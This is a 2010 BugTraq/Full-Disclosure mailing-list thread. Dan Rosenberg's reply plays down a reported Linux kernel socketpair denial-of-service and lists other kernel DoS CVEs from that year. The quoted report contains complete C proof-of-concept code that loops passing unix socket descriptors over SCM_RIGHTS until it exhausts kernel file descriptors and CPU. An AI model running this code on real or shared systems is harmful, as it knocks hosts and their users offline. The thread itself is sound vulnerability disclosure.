BugTraq
Re: [Full-disclosure] Simple kernel attack using socketpair. easy, 100% reproducible, works under guest. no way to protect :(
Nov 26 2010 04:12PM
Dan Rosenberg (dan j rosenberg gmail com)
It's funny to me that this should get special attention over any of
the several dozen local DoS vulnerabilities that have been made public
this year, starting with:

CVE-2010-2954: NULL pointer dereference in IRDA
CVE-2010-2960: NULL pointer dereference in keyctl
CVE-2010-3066: NULL pointer dereference in io_submit_one()
CVE-2010-3080: double free in oss
CVE-2010-3086: kernel panic in futex handling
CVE-2010-3442: non-exploitable heap corruption in sound/core
CVE-2010-4163: OOM-killer invocation in block layer
CVE-2010-4164: kernel panic in block layer
CVE-2010-4175: out-of-bounds read in RDS
CVE-2010-4161: deadlock in socket filters
CVE-2010-4243: 64-bit OOM trigger

The fix for this one is already committed or in the process of being
worked on, if it's indeed a separate issue from the similar unix
socketpair issue that was reported a couple days ago
(http://marc.info/?l=linux-kernel&m=129055087923940&w=2), which is
unclear at this time.

In short: nothing especially out of the ordinary to see here.

-Dan

On Fri, Nov 26, 2010 at 9:58 AM, Key Night <key.night (at) googlemail (dot) com [email concealed]> wrote:
> Simple kernel attack using socketpair. easy, 100% reproducible, works
> under guest. no way to protect :(
>
> See source attached.
>
> The process ends up in state 'Running' but is not killable via kill -KILL.
>
> Eats 100% CPU, eats all available internal file descriptors in the kernel :(
>
> --
> Segmentation fault
>
>
> #include <string.h>
> #include <sys/socket.h>
> #include <sys/un.h>
> #include <unistd.h>
>
> /* Pass file descriptor fd over the unix socket unix_fd as SCM_RIGHTS
>    ancillary data. */
> static int send_fd (int unix_fd, int fd)
> {
>     struct msghdr msgh;
>     struct cmsghdr *cmsg;
>     char buf[CMSG_SPACE (sizeof (fd))];
>
>     memset (&msgh, 0, sizeof (msgh));
>     memset (buf, 0, sizeof (buf));
>
>     msgh.msg_control = buf;
>     msgh.msg_controllen = sizeof (buf);
>
>     cmsg = CMSG_FIRSTHDR (&msgh);
>     cmsg->cmsg_len = CMSG_LEN (sizeof (fd));
>     cmsg->cmsg_level = SOL_SOCKET;
>     cmsg->cmsg_type = SCM_RIGHTS;
>
>     msgh.msg_controllen = cmsg->cmsg_len;
>
>     memcpy (CMSG_DATA (cmsg), &fd, sizeof (fd));
>     return sendmsg (unix_fd, &msgh, 0);
> }
>
> int main (void)
> {
>     int fd[2], ff[2];
>
>     if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
>         return 1;
>
>     /* Each round creates a new socketpair, sends both ends of the
>        previous pair into it as in-flight descriptors, closes the
>        userspace references to the previous pair and repeats; the
>        passed descriptors are never received by anyone. */
>     for (;;)
>     {
>         if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff) == -1)
>             return 2;
>         send_fd (ff[0], fd[0]);
>         send_fd (ff[0], fd[1]);
>
>         close (fd[1]);
>         close (fd[0]);
>         fd[0] = ff[0];
>         fd[1] = ff[1];
>     }
> }
>
> Source: http://lkml.org/lkml/2010/11/25/8
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Copyright 2010, SecurityFocus